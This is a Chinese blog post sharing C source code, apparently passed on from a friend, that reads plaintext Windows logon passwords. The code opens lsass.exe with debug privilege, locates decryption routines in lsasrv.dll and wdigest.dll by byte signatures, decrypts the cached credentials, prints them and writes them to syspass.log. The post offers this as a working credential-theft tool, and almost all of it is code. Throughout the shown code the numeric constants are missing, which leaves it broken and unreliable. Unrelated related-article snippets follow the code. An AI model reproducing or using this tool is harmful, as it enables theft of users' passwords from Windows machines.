用C读取系统明文(附源码)
从一好朋友那得到一个好东西
可以读取系统明文
请用vc++ 6.0编译
#include <windows.h>
#include <stdio.h> //
// Vsbat[0x710dddd]
//
// Note: VC++ 6.0编译/Admin权限执行
// #define MEM_SIZE 0x1000
#define WIN7 0x1
#define WINXP 0x2
#define WIN03 0x4 typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ; typedef struct _SECURITY_LOGON_SESSION_DATA {
ULONG Size;
LUID LogonId;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING LogonDomain;
LSA_UNICODE_STRING AuthenticationPackage;
ULONG LogonType; ULONG Session;
PSID Sid;
LARGE_INTEGER LogonTime;
LSA_UNICODE_STRING LogonServer;
LSA_UNICODE_STRING DnsDomainName;
LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA, *PSECURITY_LOGON_SESSION_DATA ; typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ; int EnableDebugPrivilege() ;
void printHexBytes(PBYTE data, int nBytes) ;
PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
HANDLE GetProcessHandleByName(const CHAR *szName) ;
LPVOID GetEncryptListHead() ;
void printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ; // 解密函数特征码(lsasrv.text)
BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B,
0xEC, 0x6A, 0x00, 0xFF,
0x75, 0x0C, 0xFF, 0x75,
0x08, 0xE8 } ; // 密钥KEY相关的关键地址特征码(lsasrv.text)
BYTE DecryptKeySign_WIN7[] = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ;
BYTE DecryptKeySign_XP[] = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ; // 密文关键指针特征码(wdigest.text)
BYTE KeyPointerSign[] = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ; // 全局变量
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
BYTE Encryptdata[0x100] ; HANDLE GetProcessHandleByName(const CHAR *szName)
{
//
// GetProcessHandle获得lsass.exe进程句柄
//
DWORD dwProcessId , ReturnLength, nBytes ;
WCHAR Buffer[MAX_PATH + 0x20] ;
HANDLE hProcess ;
PWCHAR pRetStr ;
pNTQUERYPROCESSINFORMATION NtQueryInformationProcess ;
CHAR szCurrentPath[MAX_PATH] ; NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , \
"NtQueryInformationProcess") ; // Process ID 一定是 4 的倍数
for(dwProcessId = ; dwProcessId < * ; dwProcessId += )
{
hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, dwProcessId) ;
if(hProcess != NULL)
{
if(!NtQueryInformationProcess(hProcess, , Buffer, sizeof(Buffer), &ReturnLength))
{
pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + )) ; nBytes = WideCharToMultiByte(CP_ACP, , pRetStr, -, \
szCurrentPath, MAX_PATH, NULL, NULL) ;
if(nBytes)
{
PCHAR pCurName = &szCurrentPath[nBytes-] ;
while(pCurName >= szCurrentPath)
{
if(*pCurName == '\\') break ;
pCurName -- ;
}
pCurName ++ ;
if(lstrcmpi(szName, pCurName) == )
{
return hProcess ;
}
}
}
// 关闭打开的句柄
CloseHandle(hProcess) ;
}
}
return NULL ;
} LPVOID GetEncryptListHead()
{
//
// 根据KeyPointerSign[]获得密文存储的关键相关地址
//
HINSTANCE hMod ;
LPVOID pEndAddr, KeyPointer, pTemp ; hMod = LoadLibrary("wdigest.dll") ;
pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ;
pTemp = hMod ;
KeyPointer = NULL ;
while(pTemp < pEndAddr && pTemp != NULL)
{
KeyPointer = pTemp ;
pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
KeyPointerSign, sizeof(KeyPointerSign)) ;
}
KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - )) ;
FreeLibrary(hMod) ;
return KeyPointer ;
} void k8writeTxt(char* logtext)
{ //写入txt
FILE* pFile = NULL;
pFile = fopen( "syspass.log", "a+" ); // 12345/n5678/n 用sizeof 结果竟然只得到 1234
//fwrite( ptext2, sizeof(ptext2), 1, pFile ); fwrite( logtext, strlen(logtext), , pFile ); fclose( pFile ); //关闭时会写入结束符
} int main()
{
HINSTANCE hModlsasrv ;
DWORD LogonSessionCount, i ,dwBytesRead ;
PLUID LogonSessionList, pCurLUID , pListLUID ;
BYTE EncryptBuf[0x200] ;
HANDLE hProcess ; if(EnableDebugPrivilege() != )
puts("EnableDebugPrivilege fail !") ; hProcess = GetProcessHandleByName("lsass.exe") ;
if(hProcess == NULL)
{
puts("GetProcessHandleByName fail !") ;
puts("Try To Run As Administrator ...") ;
system("echo Press any Key to Continue ... & pause > nul") ;
return ;
} OSVERSIONINFO VersionInformation ;
DWORD dwVerOff = , osKind = - ; // 版本判断
memset(&VersionInformation, , sizeof(VersionInformation));
VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ;
GetVersionEx(&VersionInformation) ;
if (VersionInformation.dwMajorVersion == )
{
if ( VersionInformation.dwMinorVersion == )
{
dwVerOff = ;
osKind = WINXP ;
}
else if (VersionInformation.dwMinorVersion == )
{
dwVerOff = ;
osKind = WIN03 ;
}
}
else if (VersionInformation.dwMajorVersion == )
{
dwVerOff = ;
osKind = WIN7 ;
} if(osKind == -)
{
printf("[Undefined OS version] Major: %d Minor: %d\n", \
VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ;
system("echo Press any Key to Continue ... & pause > nul") ;
CloseHandle(hProcess) ;
return ;
} // 获得解密函数地址
pDECRIPTFUNC DecryptFunc ;
hModlsasrv = LoadLibrary("lsasrv.dll") ;
DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign)) ; // 获得密文链表头地址
LPVOID ListHead ;
ListHead = GetEncryptListHead() ; // 获得全局数据(lsasrv.data及解密KEY相关的数据)
CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ; HINSTANCE hModSecur32 ;
pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions ;
pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData ;
pLSAFREERETURNBUFFER LsaFreeReturnBuffer ; hModSecur32 = LoadLibrary("Secur32.dll") ;
LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ;
LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ;
LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ; LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ;
for(i = ; i < LogonSessionCount ; i++)
{
pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ;
// 打印相关信息
printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ;
// 遍历链式结构查找当前的LUID
ReadProcessMemory(hProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead) ;
while(*(DWORD *)EncryptBuf != (DWORD)ListHead)
{
ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead) ;
pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10) ;
if((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
{
break ;
}
}
if(*(DWORD *)EncryptBuf == (DWORD)ListHead)
{
puts("Specific LUID NOT found\n") ;
continue ;
} DWORD pFinal = ;
DWORD nBytes = ;
LPVOID pEncrypt ;
pFinal = (DWORD)(pListLUID) + dwVerOff ;
nBytes = *(WORD *)((DWORD)pFinal + ) ; // 密文大小
pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + )) ; // 密文地址(Remote) memset(Encryptdata, , sizeof(Encryptdata)) ;
ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead) ; // 调用解密函数解密
DecryptFunc(Encryptdata, nBytes) ;
// 打印密码明文
printf("password: %S\n\n", Encryptdata) ; k8writeTxt((char*)Encryptdata);//保存日志
} CloseHandle(hProcess) ;
LsaFreeReturnBuffer(LogonSessionList) ; FreeLibrary(hModlsasrv) ;
FreeLibrary(hModSecur32) ;
if(osKind == WIN7)
{
FreeLibrary(GetModuleHandle("bcrypt.dll")) ;
FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ;
} system("echo Press any Key to EXIT ... & pause > nul") ; return ;
} void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
PSECURITY_LOGON_SESSION_DATA pLogonSessionData ; LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ;
printf("UserName: %S\n", pLogonSessionData->UserName.Buffer) ;
printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer) ; LsaFreeReturnBuffer(pLogonSessionData) ;
} int EnableDebugPrivilege()
{
HANDLE hToken ;
LUID sedebugnameValue ;
TOKEN_PRIVILEGES tkp ; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) )
{
puts("OpenProcessToken fail") ;
return ;
}
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
puts("LookupPrivilegeValue fail") ;
return ;
} tkp.PrivilegeCount = ;
tkp.Privileges[].Luid = sedebugnameValue ;
tkp.Privileges[].Attributes = SE_PRIVILEGE_ENABLED ;
if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) )
{
puts("AdjustTokenPrivileges fail") ;
return ;
}
return ;
} PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
//
// 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列,字节个数为nsize
//
DWORD count ;
PBYTE pDst ; while((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
{
pDst = pBytes ;
count = ;
while(count < nsize && *pBegin == *pDst)
{
pBegin ++ ;
pDst ++ ;
count ++ ;
}
if(count == nsize) break ;
pBegin = pBegin - count + ;
}
if(count == nsize)
{
return (PBYTE)((DWORD)pBegin - (DWORD)count) ;
}
else
{
return NULL ;
}
} void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
PIMAGE_SECTION_HEADER pSectionHead ;
PIMAGE_DOS_HEADER pDosHead ;
PIMAGE_NT_HEADERS pPEHead ;
DWORD dwBytes, dwBytesRead ;
LPVOID pdataAddr, pDecryptKey , DecryptKey, pEndAddr ; pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv ;
pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv \
+ sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ; pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv) ;
dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + ) * 0x1000 ;
ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ; pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv) ;
pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv) ; switch(osKind)
{
case WINXP :
case WIN03 :
{
pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ; pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP)) ;
ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, , &dwBytesRead) ;
// DecryptKey 是与解密相关的关键地址
ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
pdataAddr = (LPVOID)pDecryptKey ;
*(DWORD *)pdataAddr = (DWORD)MemBuf ; break ;
}
case WIN7 :
{
// WIN7 需调用这两个DLL中的函数进行解密
LoadLibrary("bcrypt.dll") ;
LoadLibrary("bcryptprimitives.dll") ; pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ;
pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - )) ; // DecryptKey 是与解密相关的关键地址
ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ; ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
pdataAddr = (LPVOID)pDecryptKey ;
*(DWORD *)pdataAddr = (DWORD)MemBuf ; ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + )), SecBuf, 0x200, &dwBytesRead) ;
pdataAddr = (LPVOID)((DWORD)MemBuf + ) ;
*(DWORD *)pdataAddr = (DWORD)SecBuf ; ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead) ;
pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC) ;
*(DWORD *)pdataAddr = (DWORD)ThirdBuf ; break ;
}
}
return ;
}
用C读取系统明文(附源码)的更多相关文章
- Java开发简单的家居购物商城系统 JSP 附源码
开发环境: Windows操作系统开发工具: MyEclipse+Jdk+Tomcat+MYSQL数据库 注意:使用tomcat7运行 运行效果图 源码及原文链接:https://javadao ...
- 构建ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统(10)-系统菜单栏[附源码]
系列目录 似乎我们需要更多的模块了,我们有一个样例程序,可以帮助我们以后的系统开发做很多对照,我们稍后还有系统日志和系统异常的记录,这时浏览发生了困难,我们这一节来完成一个大家比较喜欢的东西吧,系统菜 ...
- 【游戏开发&Unity】捏脸系统(附源码)
本着“没有捏脸系统算什么RPG”的想法,着手做一个2d简易捏脸demo.其实换装游戏都差不多啦~ github代码地址:Simple-Character-Edit-System (Unity版本:5. ...
- 聊天系统Demo,增加文件传送功能(附源码)-- ESFramework 4.0 快速上手(14)
本文我们将介绍在ESFramework 4.0 快速上手(08) -- 入门Demo,一个简单的IM系统(附源码)的基础上,增加文件传送的功能.如果不了解如何使用ESFramework提供的文件传送功 ...
- 聊天系统Demo,增加Silverlight客户端(附源码)-- ESFramework 4.0 快速上手(09)
在ESFramework 4.0 快速上手 -- 入门Demo,一个简单的IM系统(附源码)一文中,我们介绍了使用ESFramework的Rapid引擎开发的winform聊天程序,本文我们将在之前d ...
- ArcGIS紧凑型切片读取与应用2-webgis动态加载紧凑型切片(附源码)
1.前言 上篇主要讲了一下紧凑型切片的的解析逻辑,这一篇主要讲一下使用openlayers动态加载紧凑型切片的web地图服务. 2.代码实现 上篇已经可以通过切片的x.y.z得对应的切片图片,现在使用 ...
- Ext.NET 4.1 系统框架的搭建(后台) 附源码
Ext.NET 4.1 系统框架的搭建(后台) 附源码 代码运行环境:.net 4.5 VS2013 (代码可直接编译运行) 预览图: 分析图: 上面系统的构建包括三块区域:North.West和C ...
- 读取xml文件转成List<T>对象的两种方法(附源码)
读取xml文件转成List<T>对象的两种方法(附源码) 读取xml文件,是项目中经常要用到的,所以就总结一下,最近项目中用到的读取xml文件并且转成List<T>对象的方法, ...
- ASP.NET程序读取二代身份证(附源码)
原文:ASP.NET程序读取二代身份证(附源码) 一般来说winform应用程序解决这个问题起来时很容易的,web应用程序就麻烦一点了. 这里我说说我的解决思路: 一.你必要有联机型居民身份证阅读器一 ...
随机推荐
- C++ Primer 5th 第17章 标准库特殊设施
C++新标准库提供了很多新功能,它们更加强大和易用. tuple类型 tuple是一种类似pair的模板,pair可以用来保存一对逻辑上有关联的元素对.但与pair不同的是,pair只能存储两个成员, ...
- 当遇到not a dynamic executable时怎么做
当我使用ldd查找Drcom所缺少的32为库的时候提示not a dynamic executable 最后网上找到答案 来自http://forum.ubuntu.org.cn/viewtopic. ...
- 【算法】Base64编码
1.说明 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法. 2.编码 ASCII码 -> 十六进制码 -> ...
- git —— bug分支
储藏工作现场 $ git stash 切换到需要修改bug的分支,创建临时分支 修复bug,修复完提交 修复完之后,切换到需要修改的分支.完成合并 合并后删除临时分支 完成后,可以重新回到没有修改完的 ...
- Robot Framework测试框架用例脚本设计方法
Robot Framework介绍 Robot Framework是一个通用的关键字驱动自动化测试框架.测试用例以HTML,纯文本或TSV(制表符分隔的一系列值)文件存储.通过测试库中实现的关键字驱动 ...
- css 让背景图片不停旋转
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...
- ViewPager中的子Activity无法响应OnActivityResult的解决方法
ViewPager子Activity通过startActivityForResult()跳转至OtherActivity,OtherActivity回传结果由ViewPager所在的父Activity ...
- Hive SQL综合案例
一 Hive SQL练习之影评案例 案例说明 现有如此三份数据:1.users.dat 数据格式为: 2::M::56::16::70072, 共有6040条数据对应字段为:UserID BigInt ...
- day1作业二:多级菜单操作
作业二:多级菜单 (1)三级菜单 (2)可以次选择进入各子菜单 (3)所需新知识点:列表.字典 要求:输入back返回上一层,输入quit退出整个程序 思路: (1)首先定义好三级菜单字典: (2)提 ...
- elastucasearch基础理论以及安装
一.elasticasearch核心概念 Near Realtime(NRT 近实时) Elasticsearch 是一个近实时的搜索平台.您索引一个文档开始直到它被查询时会有轻微的延迟时间(通常为1 ...